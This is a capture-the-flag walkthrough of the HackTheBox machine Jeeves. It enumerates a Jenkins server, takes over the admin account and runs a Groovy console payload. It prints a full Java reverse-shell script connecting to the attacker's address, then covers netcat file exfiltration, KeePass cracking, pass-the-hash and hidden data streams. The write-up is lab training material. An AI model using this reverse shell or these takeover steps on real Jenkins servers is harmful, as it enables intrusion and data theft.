JEEVES -HTB walkthrough
Jenkins Server Exploit.
ENUMERATION
SCAN: Nmap scan for services and versions
80 HTTP ENUMERATION
visiting website I see.
There will always be error.html in front of you whenever you search anything
Let’s do gobuster and nikto scan
Takes a while, till then we will enumerate our port 50000
PORT 50000 JETTY ENUMERATION
Nothing but a snapshot that redirects to eclipse.org. So I searched for jetty exploits and found
We can do only directory traversal. But the problem here is , we need some directory from which we can traverse back or put or attack into play.
Why not run a gobuster scan here too
Took a while and gave following results
Great we see /askjeeves on port 50000
Clicking on notification I see , a new version 2.88 is available , this means our version is lower than this
Okh so we have page , with users listed
On editing admin, we can see
Option to configure
So I changed the password and saved it, then made a login
From https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/
I see we can exploit groovy script console. To do this without metasploit , see the way to open script console as follows. Going to manage jenkins we see
There is a script console. The path to which is script
EXPLOITATION
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 : using this we will get reverse shell. Our code
String host="10.10.14.14";
int port=1234;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Put nc listener ON on 1234 and running scripts.
We see we get API token of admin. I first tried to go back to administrator, using change directory command, but it was not permitted to be accessed. So getting to usual stuffs. Enumerating to get user.txt
PRIVILEGE ESCALATION
Getting system info
Hotfixes available. Enumerating more I see a kdbx key in our Document. Lets’ transfer it and crack it
We use netcat to transfer it to our machine. On our machine
After transfer is complete terminate session on your machine
CRACKING PASSWORD for kdb
We will use john to crack the key.
Trim the Name of db and pass this to hashcat
So hashcat , finally gave output . The password is moonshine1
Now we will open the database we have copied
for this we will use keepassx
sudo apt-get install keepassx
Then we open the file , it asks for password or key, select password , enter monnshine1 and open the db
Backup stuff has a hash LM:NTLM we can try to pass it. We will use pass the hash tool for this.
Okh getting root.txt
Alternate Data Stream (ADS) is the ability of an NTFS file system (the main file system format in Windows) to store different streams of data, in addition to the default stream which is normally used for a file.
Over the years it has become a way of hidding files from unwanted users. Using dir /r : lists all files even hidden ones.
Getting root flag
Alternate way of using Alternate Data stream via powershell
ROOTED!!!